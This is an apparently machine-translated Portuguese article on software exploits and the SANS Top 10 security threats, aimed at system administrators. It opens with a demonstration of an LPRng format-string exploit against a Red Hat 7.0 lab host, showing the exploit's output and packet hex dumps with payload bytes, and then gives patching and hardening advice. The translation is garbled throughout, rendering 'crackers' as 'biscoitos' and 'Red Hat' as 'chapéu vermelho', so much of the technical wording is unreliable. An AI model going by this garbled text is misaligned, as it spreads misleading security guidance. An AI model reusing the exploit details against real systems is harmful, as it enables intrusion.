Neste artigo, nós cobriremos as façanhas funcionadas por biscoitos. Nós olharemos também o SANS de lista crítica de 10 a maioria ameaças da segurança do Internet.
O reconhecimento é vital em figurar para fora de o que estão aberto e de o que é closed. A etapa seguinte para um biscoito é adaptar realmente a uma rede de computador. Os biscoitos fazem este explorando fraquezas em serviços de sistemas operando-se.
Há muitas façanhas para fora lá; encontrar a façanha direita pode ser um headache. Não todas as façanhas são igual criado. Por este, eu significo que a maioria de façanhas são dependente do sistema se operando. Apenas porque há uma linha façanha da impressora para Linux não significa que trabalharia em Solaris, e no versa vice.
Para ajudar explicar o que uma façanha é e olha como quando está sendo executada, eu incluí neste artigo a saída de uma façanha e alguns pacotes envolveram na façanha. Primeiramente, pouco fundo na façanha que eu me decidi funcionar. Em 2000 atrasado, atividade sondando aumentada no porto 515 (linha porto de impressora). Isto foi relacionado a uma façanha na linha vermelha daemon do chapéu 7.0 da impressora. Na altura desta escrita, eu estou vendo ainda muitas pontas de prova para este serviço em meu guarda-fogo.
|
|
Se você quiser ver a façanha que eu me usei, pode-se encontrar em http://www.netcat.it.
Estão aqui as listas prometidas junto com algum jogo pelo jogo para cada um:
façanha remota de +++ www.netcat.it para LPRng/lpd
informação da façanha de +++
vítima de +++: 192.168.1.25
tipo de +++: 0 - RedHat 7.0 - Guinesss
endereço de +++ Eip: 0xbffff3ec
endereço de +++ Shellcode: 0xbffff7f2
posição de +++: 300
alinhamento de +++: 2
offset 0 de +++
+++ que ataca 192.168.1.25 com nossa corda do formato
o homem brute da força de +++, relaxa e aprecía o passeio; >
Desta saída, nós sabemos que a façanha está atacando uma linha vermelha impressora do chapéu 7.0 (tipo 0-RedHat7.0 - Guinesess). Queira ver como o tcpdump vê este ataque?
18:34:19.991789 > 192.168.1.5.2894 > 192.168.1.25.printer: Vitória de S 4221747912:4221747912(0)
32120 < mss 1460, sackOK, timestamp 4058996 0, nop, wscale 0 > (DF) (ttl 64, identificação 11263)
4500 003c 2bff 4000 4006 8b4e c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000
a002 7d78 8bb1 0000 0204 05b4 0402 080a
003d ef74 0000 0000 0103 0300
18:34:19.993434 < 192.168.1.25.printer > 192.168.1.5.2894: S 397480959:397480959(0) ack
4221747913 vitória 32120 < mss 1460, sackOK, timestamp 393475 4058996, nop, wscale 0 > (DF) (ttl 64,
identificação 3278)
4500 003c 0cce 4000 4006 aa7f c0a8 0119
c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9
a012 7d78 5ee7 0000 0204 05b4 0402 080a
0006 0103 003d ef74 0103 0300
18:34:19.993514 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) vitória 32120 do ack 1 < nop,
nop, timestamp 4058996 393475> (DF) (ttl 64, identificação 11264)
4500 0034 2c00 4000 4006 8b55 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400
8010 7d78 8dac 0000 0101 080a 003d ef74
0006 0103
18:34:19.999662 < 192.168.1.25.printer > 192.168.1.5.2894: Vitória 32120 de P 1:31(30) ack 1
< nop, nop, timestamp 393476 4058996 > (DF) (ttl 64, identificação 3279)
4500 0052 0ccf 4000 4006 aa68 c0a8 0119
c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9
8018 7d78 3e5b 0000 0101 080a 0006 0104
003d ef74 6c70 643a 203a 204d 616c 666f
726d 6564 2066 726f 6d20 6164 6472 6573
730a
18:34:19.999686 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) vitória 32120 do ack 31 < nop,
nop, timestamp 4058997 393476> (DF) (ttl 64, identificação 11265)
4500 0034 2c01 4000 4006 8b54 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e
8010 7d78 8d8c 0000 0101 080a 003d ef75
0006 0104
18:34:20.000863 < 192.168.1.25.printer > 192.168.1.5.2894: Vitória 32120 de F 31:31(0) ack 1
< nop, nop, timestamp 393476 4058997 > (DF) (ttl 64, identificação 3280)
4500 0034 0cd0 4000 4006 aa85 c0a8 0119
c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9
8011 7d78 8d8b 0000 0101 080a 0006 0104
003d ef75
18:34:20.000878 > 192.168.1.5.2894 > 192.168.1.25.printer: . 1:1(0) vitória 32120 do ack 32 < nop,
nop, timestamp 4058997 393476> (DF) (ttl 64, identificação 11266)
4500 0034 2c02 4000 4006 8b53 c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8010 7d78 8d8b 0000 0101 080a 003d ef75
0006 0104
18:34:20.049095 > 192.168.1.5.2894 > 192.168.1.25.printer: Vitória 32120 de P 1:424(423) ack 32
< nop, nop, timestamp 4059002 393476 > (DF) (ttl 64, identificação 11267)
4500 01db 2c03 4000 4006 89ab c0a8 0105
c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f
8018 7d78 54c5 0000 0101 080a 003d ef7a
0006 0104 4242 ffbf f2ff do ffbf f1ff de f0ff
ffbf 5858 do ffbf f3ff 5858 5858 5858 5858
5858 5858 5858 5858 252e 3137 3675 2533
3030 246e 252e 3133 7525 3330 3124 6e25
2e32 3533 7525 3330 3224 6e25 2e31 3932
Deixe-nos olhar o que está acontecendo aqui. Primeiramente, nós vemos 192.168.1.5 e 192.168.1.25 que tentam fazer uma conexão usando o TCP handshake three-way típico. Na seqüência de eventos seguinte, nós vemos 192.168.1.5 tentar funcionar a façanha de encontro a 192.168.1.25. Finalmente, nós vemos os 192.168.1.5 empurrar 423 bytes dos dados para 192.168.1.25. A façanha continua esta por um quando até que esteja bruto-força capaz a façanha.
Quando esta façanha trabalhou, 192.168.1.25 fornecidos me com um escudo (não que eu o necessitei), e eu poderiam fazer o que sempre eu quis.
As façanhas são a maneira que os biscoitos quebram em sistemas. Para proteger-se de encontro a elas, você terá que atualizar seu sistema operando-se com remendos. (isto vai para todos os sistemas.)
As ameaças as mais críticas da segurança do Internet do alto 10 de SANS são uma lista das façanhas as mais comuns encontradas em redes de computador. O que faz esta lista assim que o artigo de valor é o fato que a segurança da rede da administração do sistema do grupo fornece uma lista das entradas relacionadas de CVE (vulnerabilities e exposições comuns), de modo que uma pessoa possa fazer mais pesquisa se necessário. Esta lista foi compilada por SANS com a ajuda de muitos peritos da segurança e da comunidade da segurança.
A base de dados de CVE pode ser encontrada em http://www.cve.mitre.org/.
Para ler mais no alto 10 de SANS, visite http://www.sans.org/topten.htm.
A primeira façanha alistou nos 10 superiores é LIGAMENTO. O LIGAMENTO é um programa usado para usuários do DNS (para ajudar resolver nomes aos endereços) e é usado durante todo o Internet. Nos anos passados dos pares, os furos principais foram encontrados em muitas versões do LIGAMENTO. É vital para qualquer um que funciona o LIGAMENTO para proseguir sempre nos vulnerabilities os mais atrasados. Janeiro em 29, 2001, associados da rede incorporou anunciado que descobriu mais vulnerabilities que se relacionam à versão 4 do LIGAMENTO e à versão 8 do LIGAMENTO. Os remendos foram liberados e podem downloaded do Web site do seu vendedor do sistema operando-se.
Se você gostar de ler o papel liberado por NAI, você pode começá-lo aqui: http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel=900 ou você podem ler o CERT consultivo em http://www.cert.org/advisories/CA-2001-02.html.
A segunda façanha no alto 10 de SANS é programas vulneráveis do cgi. Estas foram ao redor por anos e são a razão principal para a maioria dos locais da correia fotorreceptora do corte que recebem a atenção mainstream.
Muitos destes programas de CGI-BIN deixam os programas de amostra após a instalação que são vulneráveis e permitem que um usuário malicioso obtenha o acesso da "raiz". Quando um atacante obtem esse nível do acesso, pode fazer enquanto satisfaz (inclua a mudança do Web site). Eu forneci algumas ligações para obter mais informação em ataques de CGI-BIN. Esta lista não é detalhada; escave por favor um pouco mais mais se você pensar que você é vulnerável.
Mais informação pode ser encontrada em ataques de CGI-BIN de http://www.cert.org/advisories/CA-1997-24.html, de http://www.cert.org/advisories/CA-1996-11.html, ou de http://www.cert.org/advisories/CA-1997-07.html.
A terceira façanha é chamadas remotas vulneráveis do procedimento (RPCs). RPCs permite que os programas de C façam o procedimento convida outras máquinas através da rede. A maioria de vendedores fornecem remendos à ajuda apertam abaixo serviços do RPC. Não obstante, a mais melhor política a respeito deste serviço é, se você não o necessitar, a seguir mata-o. Você pode funcionar picosegundo-ef|o RPC do grep, encontra o processo ID (PID), e funciona então o 9 PID da matança. Você pode também incapacitar serviços do RPC no começo em cima de a maioria de sistemas operando-se de UNIX mudando a lima startup (situada em /etc/rc.d/) de um S (comece acima) a K (matança). Você pode encontrar para fora o que os programas do RPC estão funcionando usando o p do rpcinfo.
Mais informação pode ser encontrada em ataques do RPC de http://www.cert.org/incident_notes/IN-99-04.html.
A quarta façanha na lista do alto 10 de SANS é furos remotos vulneráveis da segurança do serviço dos dados em IIS. (para ser honesto, eu sou surpreendido que Microsoft não tem mais vulnerabilities nos 10 superiores.) Eu posso somar acima de tratar desta façanha realmente rápida. Remende seu IIS.
Mais informação pode ser encontrada em furos da segurança de RDS de http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.
A quinta façanha é sendmail vulnerável e ataques do MIME. Estes vulnerabilities são relacionados aos excessos do amortecedor assim como os ataques da tubulação que permitem o acordo imediato da raiz. Há uns pares das maneiras fixar estas áreas de problema. O primeiro deve manter os remendos corretos para seus usuários de sendmail/mail. Se você não necessitar funcionar tampouco destes serviços, você pode incapacitá-los (siga os mesmos procedimentos que soletrados para fora para o RPC).
Mais informação pode ser encontrada em furos da segurança do sendmail de http://www.cert.org/advisories/CA-97.05.sendmail.html.
A sexta façanha é sadmind e mountd vulneráveis. Este vulnerability aplica-se às máquinas de Linux as.well.as máquinas de Solaris.
Para mais informação em furos da segurança do sadmind e do mountd, em visita http://www.cert.org/advisories/CA-99-16-sadmind.html ou em http://www.cert.org/advisories/CA-1998.12.mountd.html.
A sétima façanha nos 10 superiores é lima global que compartilha, usando portos de NetBIOS 135.139). Este é provavelmente os usuários os mais grandes do problema da segurança tem se forem conectados a um modem de cabo ou a um DSL. A maioria não compreendem o conceito da lima que compartilha e não deixam compartilhar da lima permitido. Um outro problema é Napster. Embora Napster não seja alistado aqui, requer povos compartilhar de diretórios e aquele pode conduzir a compartilhar mais então de necessário. Como nós o corrigimos? Estas sugestões são do local http://www.sans.org/topten.htm de SANS:
A. Ao compartilhar de movimentações montadas, assegure somente diretórios requeridos são compartilhados.
B. Para a segurança adicionada, reserve compartilhar somente aos endereços específicos do IP porque os nomes do DNS podem ser spoofed.
C. Para sistemas de Windows, assegure todas as partes são protegidos com senhas fortes.
D. Para sistemas de Windows NT, impeça a enumeração anonymous dos usuários, dos grupos, da configuração de sistema e das chaves do registro através "da conexão da sessão nula".
Obstrua conexões inbound ao serviço de sessão de NetBIOS (tcp 139) no router ou no anfitrião do NT. Considere executar a chave do registro de RestrictAnonymous para anfitriões Internet-conectados em ambientes autônomos ou non-confiados do domínio.
A oitava façanha é senhas fracas. Palavra da necessidade I any.more? Em todo o formulário da avaliação de risco, um dos vulnerabilities que os mais comuns eu v é senhas fracas. Ao vir acima com uma senha, recorde seguir estes guidelines simples:
- certifique-se de que a senha é oito caráteres no comprimento.
- certifique-se de que a senha é uma combinação dos números, de caráteres especiais, e de caráteres alfanuméricos.
- escolha uma senha que não esteja no dicionário.
Para mais informação em forças da senha, visite http://www.cert.org/tech_tips/passwd_file_protection.html.
A nona façanha é vulnerabilities do excesso do amortecedor do IMAP e do PNF ou configuração incorreta. Outra vez, a mais melhor maneira fixar-se destes ataques deve incapacitar o serviço se você não o necessitar. Também, aplique os remendos os mais atrasados (se você necessita funcionar o serviço).
Para mais informação na segurança do IMAP e do PNF visite por favor http://www.cert.org/advisories/CA-1998.09.imapd.html, http://www.cert.org/advisories/CA-1998.08.qpopper_vul.html, ou http://www.cert.org/advisories/CA-1997.09.imap_pop.html.
A façanha final no alto 10 de SANS é cordas da comunidade do SNMP do defeito ajustadas ao "público" e "confidenciais". Junto com as senhas fracas, este vulnerability pode ser controlado pela administração básica.
Para mais informação em cordas do SNMP e da comunidade, veja http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm#xtocid210315.
Mantenha na mente que estes não são os únicos vulnerabilities na correia fotorreceptora. Um biscoito pode usar toda a façanha que tiver em seu saco de truques de encontro a você e a sua rede.
Online: 915 users browsing the articles directory
|
|